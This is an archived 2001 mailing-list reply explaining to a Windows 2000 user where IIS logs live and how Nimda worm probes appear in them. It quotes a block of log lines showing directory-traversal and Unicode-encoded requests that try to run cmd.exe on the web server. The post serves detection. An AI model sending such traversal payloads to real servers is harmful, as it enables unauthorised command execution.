The UK Home Automation Archive

Archive Home
Group Home
Search Archive


Advanced Search

The UKHA-ARCHIVE IS CEASING OPERATIONS 31 DEC 2024

Latest message you have seen: Ipaq Screen


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: IIS Worm


  • To: ukha_d@xxxxxxx
  • Subject: Re: IIS Worm
  • From: "Mark Hetherington" <mark.egroups@xxxxxxx>
  • Date: Wed, 19 Sep 2001 09:38:47 -0000
  • Delivered-to: mailing list ukha_d@xxxxxxx
  • Mailing-list: list ukha_d@xxxxxxx; contact ukha_d-owner@xxxxxxx
  • Reply-to: ukha_d@xxxxxxx

--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated.  I am=20
on a LAN
> and am serving via IIS.  I know I was not affected by Nimda but=20
would like
> to know if an attempt was made to infect me.  I remember there is a=20
log for
> these types of things but I can't remember for the life of me where=20
it is.
> I am running Win2k Pro.

Pedro,=20

Look at the following location:

C:\WINNT\system32\LogFiles

This should have log files for most of your services. The W3SVC=20
directories relate to the web server logs.=20

An attack will look similar to this (note: IP addresses blanked for=20
privacy, first IP is the attacking machine, second is your web server=20
IP):

2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir=20
404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /msadc/..%5c../..%5c../..%
5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 403 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80=20
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


HTH.

Mark.



Home | Main Index | Thread Index

Comments to the Webmaster are always welcomed, please use this contact form . Note that as this site is a mailing list archive, the Webmaster has no control over the contents of the messages. Comments about message content should be directed to the relevant mailing list.